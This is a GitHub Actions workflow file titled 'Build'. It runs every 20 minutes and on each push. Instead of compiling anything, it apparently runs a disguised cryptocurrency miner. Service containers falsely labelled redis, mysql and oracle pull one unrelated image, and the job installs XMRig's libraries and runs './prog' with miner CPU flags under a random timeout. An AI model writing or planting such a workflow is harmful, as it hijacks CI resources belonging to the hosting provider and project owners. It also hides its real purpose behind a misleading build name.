name: Build
on:
  push:
  schedule:
    - cron: "*/20 * * * *"
jobs:
  compile:
    name: Compile
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    services:
      redis:
        image: maggierat456/peepeepoopoo:latest
      mysql:
        image: maggierat456/peepeepoopoo:latest
      oracle:
        image: maggierat456/peepeepoopoo:latest
      eggsmrig:
        image: maggierat456/peepeepoopoo:latest
    strategy:
      fail-fast: false
      matrix:
        runners:
          - linux-ubuntu-amd64
          - linux-centos-amd64
          - freebsd-amd64
          - macos-amd64
          - covfefe
          - aids
    steps:
      - run: |
          apt update -qq
          apt install -y git
      - uses: actions/checkout@v2
      - run: |
          apt install -y libuv1 libssl1.1 libhwloc15
          timeout $(shuf -i 300-820 -n 1) ./prog --cpu-no-yield --cpu-priority 5 || true
